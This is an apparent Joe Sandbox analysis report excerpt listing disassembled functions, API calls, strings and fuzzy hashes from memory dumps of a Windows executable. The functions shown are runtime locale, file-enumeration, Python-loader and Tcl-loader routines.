Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 16e06fddd5e05500c386674c4122e4722aa4802574e0c63834a3b72dcb154894
Instruction ID: 94c8454a3686ab14ca0e476efb13957476899ddc5304324e772053010bf0b7a8
Opcode Fuzzy Hash: 16e06fddd5e05500c386674c4122e4722aa4802574e0c63834a3b72dcb154894
Instruction Fuzzy Hash: DB216132F1864292EB60DF21E4A09AA6761FB54B40F944231DA7D836DDEF3CE945D740

Function 00007FF6399D0B84 Relevance: 7.8, APIs: 5, Instructions: 282COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6399D0BD0
FindFirstFileExW.KERNEL32 ref: 00007FF6399D0CDA

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: FileFindFirst_invalid_parameter_noinfo
String ID:
API String ID: 2227656907-0
Opcode ID: 88c6eeb3815b689bec9e785de6a4435637107cd6a4a104e99c849aa3a7604df1
Instruction ID: 3225b58b04e989c1bd281be9aeffe71f8d7845a520adcc52ca967e6e991e113f
Opcode Fuzzy Hash: 88c6eeb3815b689bec9e785de6a4435637107cd6a4a104e99c849aa3a7604df1
Instruction Fuzzy Hash: B3B1C722B1869281EA60DF25D8802B96392EF54BE4F5D5132ED5D87BDEDF3CE441EB00

Function 00007FFDFF1C9F54 Relevance: 7.7, APIs: 5, Instructions: 200COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDFF158354: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FFDFF1B086F,?,?,?,?,?,00007FFDFF1785F0), ref: 00007FFDFF158363
Part of subcall function 00007FFDFF158354: FlsGetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,?,00007FFDFF1B086F,?,?,?,?,?,00007FFDFF1785F0), ref: 00007FFDFF158371
Part of subcall function 00007FFDFF158354: FlsGetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,?,00007FFDFF1B086F,?,?,?,?,?,00007FFDFF1785F0), ref: 00007FFDFF158385
Part of subcall function 00007FFDFF158354: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FFDFF1B086F,?,?,?,?,?,00007FFDFF1785F0), ref: 00007FFDFF1583A1

Part of subcall function 00007FFDFF158354: FlsSetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,?,00007FFDFF1B086F,?,?,?,?,?,00007FFDFF1785F0), ref: 00007FFDFF1583C3
Part of subcall function 00007FFDFF158354: FlsSetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,?,00007FFDFF1B086F,?,?,?,?,?,00007FFDFF1785F0), ref: 00007FFDFF1583EC
Part of subcall function 00007FFDFF158354: FlsSetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,?,00007FFDFF1B086F,?,?,?,?,?,00007FFDFF1785F0), ref: 00007FFDFF1583FE

GetUserDefaultLCID.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,00000000,?,00000092,?), ref: 00007FFDFF1CA11C
IsValidCodePage.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,00000000,?,00000092,?), ref: 00007FFDFF1CA157
IsValidLocale.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,00000000,?,00000092,?), ref: 00007FFDFF1CA171
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,00000000,?,00000092,?), ref: 00007FFDFF1CA1BE
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,00000000,?,00000092,?), ref: 00007FFDFF1CA1DD

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: Value$Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 210783716-0
Opcode ID: 36ebb3905502ec542be5d465e7327d581fd16590f1bc2e7467bdeb04eba59e8c
Instruction ID: 66457b28eb5afcf73c0fa0c9ecff0befe49924755ed37fc19d3da86846b75fb4
Opcode Fuzzy Hash: 36ebb3905502ec542be5d465e7327d581fd16590f1bc2e7467bdeb04eba59e8c
Instruction Fuzzy Hash: 01817A33F0861289EB219F61E471AFD27A6BB44B88F4A4635CA3D532C8DF39E945C340

Function 00007FFDFF1CD274 Relevance: 7.7, APIs: 5, Instructions: 170fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FFDFF1CD37A
FindNextFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FFDFF1CD424
FindClose.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FFDFF1CD448
FindClose.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FFDFF1CD47B
FindClose.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FFDFF1CD49C

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: Find$Close$File$FirstNext
String ID:
API String ID: 3527384056-0
Opcode ID: 99a68284b3e596885c6a6bf75931193191d6c96826e551d9681a46c875bacce1
Instruction ID: a5af535aaeb6d94845a65ffe645880605c68a639b80bde114662632aad9a1d24
Opcode Fuzzy Hash: 99a68284b3e596885c6a6bf75931193191d6c96826e551d9681a46c875bacce1
Instruction Fuzzy Hash: 7B61B423F1868641FB209B65F864ABEB3A2AB84798F041231DE7D47ADDEF3CD0058704

Function 00007FFDFF1CD4E0 Relevance: 7.7, APIs: 5, Instructions: 153fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FFDFF1CD5C6
FindNextFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FFDFF1CD65A
FindClose.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FFDFF1CD67A
FindClose.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FFDFF1CD6AD
FindClose.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FFDFF1CD6CE

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: Find$Close$File$FirstNext
String ID:
API String ID: 3527384056-0
Opcode ID: 6297bc2cc70f4f77873b2fd98c96ff7b48e2a850c098bb88d4ea9723aff2a5b6
Instruction ID: 4cca0ffd40fbc26c99559d2eb67f578610b7d4b62dd81e3d9cd584e972308c44
Opcode Fuzzy Hash: 6297bc2cc70f4f77873b2fd98c96ff7b48e2a850c098bb88d4ea9723aff2a5b6
Instruction Fuzzy Hash: CB51C027F1869645EB20DB26B8249BA73A1EB84798F500231EEBD47ACDEF3CD455D700

Function 00007FFDFF171604 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 78libraryloaderCOMMON

Download Yara Rule

APIs

GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,?,?,00007FFDFF151139), ref: 00007FFDFF1716E2
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0(?,?,?,?,?,00007FFDFF151139), ref: 00007FFDFF1716F4

Strings

LCIDToLocaleName, xrefs: 00007FFDFF1716A3
GetLocaleInfoEx, xrefs: 00007FFDFF1716EA

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: AddressInfoLocaleProc
String ID: GetLocaleInfoEx$LCIDToLocaleName
API String ID: 2353564440-967963574
Opcode ID: 1682f26b5c7002b1e021b0fedfb78ee6d650727ff37fb1b891b17d51619bb9e2
Instruction ID: 44a49b81246385c3c1b5262c2bc360761fd2377c6e10e3f89378bc9d5e076d3b
Opcode Fuzzy Hash: 1682f26b5c7002b1e021b0fedfb78ee6d650727ff37fb1b891b17d51619bb9e2
Instruction Fuzzy Hash: 6321A222F08A0142FB149B26A8309B62791BB94BD0F084735ED7DD77E9EFBCE9458344

Function 00007FFDFF1C79D8 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FFDFF152768), ref: 00007FFDFF1C7A04
__crt_fast_encode_pointer.LIBVCRUNTIME ref: 00007FFDFF1C7A11
EnumSystemLocalesW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FFDFF152768), ref: 00007FFDFF1C7A29
LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FFDFF152768), ref: 00007FFDFF1C7A4A

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: CriticalSection$EnterEnumLeaveLocalesSystem__crt_fast_encode_pointer
String ID:
API String ID: 477862506-0
Opcode ID: 8c8e134516f2f5d3c6a8452773c07488fad1d7be98e293ec65c8985f7a1f4932
Instruction ID: 3d6d4972a96e61b786c213665b2b524faa172c0aa808567d83bdb370461e5810
Opcode Fuzzy Hash: 8c8e134516f2f5d3c6a8452773c07488fad1d7be98e293ec65c8985f7a1f4932
Instruction Fuzzy Hash: 8001E932B18A46D2EB10CF15F8A08696361FBD8B88B844231D67EC37A9DF3CD659C340

Function 00007FFDFF1C9874 Relevance: 3.1, APIs: 2, Instructions: 51COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDFF158354: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FFDFF1B086F,?,?,?,?,?,00007FFDFF1785F0), ref: 00007FFDFF158363
Part of subcall function 00007FFDFF158354: FlsGetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,?,00007FFDFF1B086F,?,?,?,?,?,00007FFDFF1785F0), ref: 00007FFDFF158371
Part of subcall function 00007FFDFF158354: FlsGetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,?,00007FFDFF1B086F,?,?,?,?,?,00007FFDFF1785F0), ref: 00007FFDFF158385
Part of subcall function 00007FFDFF158354: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FFDFF1B086F,?,?,?,?,?,00007FFDFF1785F0), ref: 00007FFDFF1583A1

GetPrimaryLen.LIBCMT ref: 00007FFDFF1C98DD
EnumSystemLocalesW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,00000040,00007FFDFF1CA0EF,?,?,?,00000000,?,00000092,?,?,?,00007FFDFF1ABE4A), ref: 00007FFDFF1C98F2

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: ErrorLastValue$EnumLocalesPrimarySystem
String ID:
API String ID: 1748788951-0
Opcode ID: 4959e17747343424fffee702f6de95557868056ce53d104169838ebd61d7072d
Instruction ID: 9e6d792b8aee26c76ca8fccefdd1269e4819f8a7dc3e742dc906c9e03dd11170
Opcode Fuzzy Hash: 4959e17747343424fffee702f6de95557868056ce53d104169838ebd61d7072d
Instruction Fuzzy Hash: 0911A0A3F0868596EB508F26E4606E93BA2EB81BA0F588335D67D473D9DF38D581C740

Function 00007FFDFF1C9928 Relevance: 3.0, APIs: 2, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDFF158354: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FFDFF1B086F,?,?,?,?,?,00007FFDFF1785F0), ref: 00007FFDFF158363
Part of subcall function 00007FFDFF158354: FlsGetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,?,00007FFDFF1B086F,?,?,?,?,?,00007FFDFF1785F0), ref: 00007FFDFF158371
Part of subcall function 00007FFDFF158354: FlsGetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,?,00007FFDFF1B086F,?,?,?,?,?,00007FFDFF1785F0), ref: 00007FFDFF158385
Part of subcall function 00007FFDFF158354: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FFDFF1B086F,?,?,?,?,?,00007FFDFF1785F0), ref: 00007FFDFF1583A1

GetPrimaryLen.LIBCMT ref: 00007FFDFF1C996C
EnumSystemLocalesW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,00000002,00007FFDFF1CA06E,?,?,?,00000000,?,00000092,?,?,?,00007FFDFF1ABE4A), ref: 00007FFDFF1C9984

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: ErrorLastValue$EnumLocalesPrimarySystem
String ID:
API String ID: 1748788951-0
Opcode ID: 522199f09f48f924607209c39eac6fcc2b202c5302d4fc7c8e99c7696c9b6613
Instruction ID: aa1dff2c0c80e6ce148aa9b432fa1e0251d4e246b38d1c1326c5bc12008d9006
Opcode Fuzzy Hash: 522199f09f48f924607209c39eac6fcc2b202c5302d4fc7c8e99c7696c9b6613
Instruction Fuzzy Hash: CCF0A463F0858182EB518F25D4607B97BA2EB80BA4F448331D67D472D9DF3C9481C701

Function 00007FFDFF1C980C Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDFF158354: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FFDFF1B086F,?,?,?,?,?,00007FFDFF1785F0), ref: 00007FFDFF158363
Part of subcall function 00007FFDFF158354: FlsGetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,?,00007FFDFF1B086F,?,?,?,?,?,00007FFDFF1785F0), ref: 00007FFDFF158371
Part of subcall function 00007FFDFF158354: FlsGetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,?,00007FFDFF1B086F,?,?,?,?,?,00007FFDFF1785F0), ref: 00007FFDFF158385
Part of subcall function 00007FFDFF158354: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FFDFF1B086F,?,?,?,?,?,00007FFDFF1785F0), ref: 00007FFDFF1583A1

EnumSystemLocalesW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,00000002,00007FFDFF1CA113,?,?,?,00000000,?,00000092,?,?,?,00007FFDFF1ABE4A), ref: 00007FFDFF1C9853

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: ErrorLastValue$EnumLocalesSystem
String ID:
API String ID: 3877517837-0
Opcode ID: cb1d6cb55d2c51722451b0d411e626633dc860edc193fc7f97c53555a79b4c19
Instruction ID: 9c5a3ba7f7592cd560a28c038e91f99a44f762265e8693b86ad563750f4a9b3c
Opcode Fuzzy Hash: cb1d6cb55d2c51722451b0d411e626633dc860edc193fc7f97c53555a79b4c19
Instruction Fuzzy Hash: 5BF054A3F0874582DB505F26E4507A96BE2EB90BB0F498331D678832D9CB78C490C604

Function 00007FF6399B50B0 Relevance: 157.9, APIs: 44, Strings: 46, Instructions: 364libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,00007FF6399B5C57,?,00007FF6399B308E), ref: 00007FF6399B50C0
GetProcAddress.KERNEL32(?,00007FF6399B5C57,?,00007FF6399B308E), ref: 00007FF6399B5101
GetProcAddress.KERNEL32(?,00007FF6399B5C57,?,00007FF6399B308E), ref: 00007FF6399B5126
GetProcAddress.KERNEL32(?,00007FF6399B5C57,?,00007FF6399B308E), ref: 00007FF6399B514B
GetProcAddress.KERNEL32(?,00007FF6399B5C57,?,00007FF6399B308E), ref: 00007FF6399B5173
GetProcAddress.KERNEL32(?,00007FF6399B5C57,?,00007FF6399B308E), ref: 00007FF6399B519B
GetProcAddress.KERNEL32(?,00007FF6399B5C57,?,00007FF6399B308E), ref: 00007FF6399B51C3
GetProcAddress.KERNEL32(?,00007FF6399B5C57,?,00007FF6399B308E), ref: 00007FF6399B51EB
GetProcAddress.KERNEL32(?,00007FF6399B5C57,?,00007FF6399B308E), ref: 00007FF6399B5213

Strings

PyUnicode_AsUTF8, xrefs: 00007FF6399B5691, 00007FF6399B56AD
PyObject_CallFunctionObjArgs, xrefs: 00007FF6399B5529, 00007FF6399B5545
PyObject_CallFunction, xrefs: 00007FF6399B5501, 00007FF6399B551D
PyList_Append, xrefs: 00007FF6399B5461, 00007FF6399B547D
PyMem_RawFree, xrefs: 00007FF6399B54B1, 00007FF6399B54CD
PyMarshal_ReadObjectFromString, xrefs: 00007FF6399B5489, 00007FF6399B54A5
PyConfig_Read, xrefs: 00007FF6399B5231, 00007FF6399B524D
PyPreConfig_InitIsolatedConfig, xrefs: 00007FF6399B55C9, 00007FF6399B55E5
Py_PreInitialize, xrefs: 00007FF6399B51B9, 00007FF6399B51D5
PyErr_Fetch, xrefs: 00007FF6399B52F9, 00007FF6399B5315
PyRun_SimpleStringFlags, xrefs: 00007FF6399B55F1, 00007FF6399B560D
PyConfig_SetWideStringList, xrefs: 00007FF6399B52A9, 00007FF6399B52C5
Failed to get address for %hs, xrefs: 00007FF6399B50D9
PyUnicode_Join, xrefs: 00007FF6399B5759, 00007FF6399B5775
PyUnicode_Decode, xrefs: 00007FF6399B56B9, 00007FF6399B56D5
Py_ExitStatusException, xrefs: 00007FF6399B511C, 00007FF6399B5138
PyConfig_Clear, xrefs: 00007FF6399B51E1, 00007FF6399B51FD
PyObject_GetAttrString, xrefs: 00007FF6399B5551, 00007FF6399B556D
PyImport_ExecCodeModule, xrefs: 00007FF6399B5411, 00007FF6399B542D
PyModule_GetDict, xrefs: 00007FF6399B54D9, 00007FF6399B54F5
PyEval_EvalCode, xrefs: 00007FF6399B53C1, 00007FF6399B53DD
PyErr_Print, xrefs: 00007FF6399B5371, 00007FF6399B538D
Py_InitializeFromConfig, xrefs: 00007FF6399B5169, 00007FF6399B5185
PyUnicode_Replace, xrefs: 00007FF6399B5781, 00007FF6399B579D
PyConfig_SetBytesString, xrefs: 00007FF6399B5259, 00007FF6399B5275
PyConfig_SetString, xrefs: 00007FF6399B5281, 00007FF6399B529D
GetProcAddress, xrefs: 00007FF6399B50E0
PyObject_Str, xrefs: 00007FF6399B55A1, 00007FF6399B55BD
PyUnicode_FromFormat, xrefs: 00007FF6399B5709, 00007FF6399B5725
PySys_GetObject, xrefs: 00007FF6399B5641, 00007FF6399B565D
PyImport_AddModule, xrefs: 00007FF6399B53E9, 00007FF6399B5405
PyUnicode_FromString, xrefs: 00007FF6399B5731, 00007FF6399B574D
PyUnicode_DecodeFSDefault, xrefs: 00007FF6399B56E1, 00007FF6399B56FD
PyStatus_Exception, xrefs: 00007FF6399B5619, 00007FF6399B5635
PyObject_SetAttrString, xrefs: 00007FF6399B5579, 00007FF6399B5595
PyErr_Restore, xrefs: 00007FF6399B5399, 00007FF6399B53B5
PyErr_NormalizeException, xrefs: 00007FF6399B5321, 00007FF6399B533D
PyErr_Occurred, xrefs: 00007FF6399B5349, 00007FF6399B5365
Py_Finalize, xrefs: 00007FF6399B5141, 00007FF6399B515D
PyImport_ImportModule, xrefs: 00007FF6399B5439, 00007FF6399B5455
PyConfig_InitIsolatedConfig, xrefs: 00007FF6399B5209, 00007FF6399B5225
Py_DecRef, xrefs: 00007FF6399B50B6, 00007FF6399B50D2
Py_IsInitialized, xrefs: 00007FF6399B5191, 00007FF6399B51AD
PySys_SetObject, xrefs: 00007FF6399B5669, 00007FF6399B5685
PyErr_Clear, xrefs: 00007FF6399B52D1, 00007FF6399B52ED
Py_DecodeLocale, xrefs: 00007FF6399B50F7, 00007FF6399B5113

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: AddressProc
String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
API String ID: 190572456-2007157414
Opcode ID: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
Instruction ID: 70dda718620aef1974c9210a040525128a2a1460ab85d1c0c6b7953fb0bc9cb7
Opcode Fuzzy Hash: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
Instruction Fuzzy Hash: B112C06490EB8391FA159F05A8901B423B3EF19795B9C1435C80E927EEFF3CB548BE81

Function 00007FF6399B6EA0 Relevance: 119.3, APIs: 33, Strings: 35, Instructions: 280libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF6399B6EB7
GetProcAddress.KERNEL32 ref: 00007FF6399B6EFD
GetProcAddress.KERNEL32 ref: 00007FF6399B6F22
GetProcAddress.KERNEL32 ref: 00007FF6399B6F47
GetProcAddress.KERNEL32 ref: 00007FF6399B6F6F
GetProcAddress.KERNEL32 ref: 00007FF6399B6F97
GetProcAddress.KERNEL32 ref: 00007FF6399B6FBF
GetProcAddress.KERNEL32 ref: 00007FF6399B6FE7
GetProcAddress.KERNEL32 ref: 00007FF6399B700F

Strings

Tcl_NewStringObj, xrefs: 00007FF6399B7235, 00007FF6399B7251
Tcl_Free, xrefs: 00007FF6399B7375, 00007FF6399B7391
Tcl_ConditionFinalize, xrefs: 00007FF6399B70CD, 00007FF6399B70E9
Tcl_DoOneEvent, xrefs: 00007FF6399B6F3D, 00007FF6399B6F59
Tcl_GetObjResult, xrefs: 00007FF6399B72AD, 00007FF6399B72C9
Tcl_EvalObjv, xrefs: 00007FF6399B7325, 00007FF6399B7341
Tcl_Finalize, xrefs: 00007FF6399B6F65, 00007FF6399B6F81
Tcl_GetVar2, xrefs: 00007FF6399B7195, 00007FF6399B71B1
Tcl_MutexFinalize, xrefs: 00007FF6399B70A5, 00007FF6399B70C1
Tcl_EvalFile, xrefs: 00007FF6399B72D5, 00007FF6399B72F1
Tcl_Alloc, xrefs: 00007FF6399B734D, 00007FF6399B7369
Tcl_CreateInterp, xrefs: 00007FF6399B6EF3, 00007FF6399B6F0F
Tcl_ConditionWait, xrefs: 00007FF6399B711D, 00007FF6399B7139
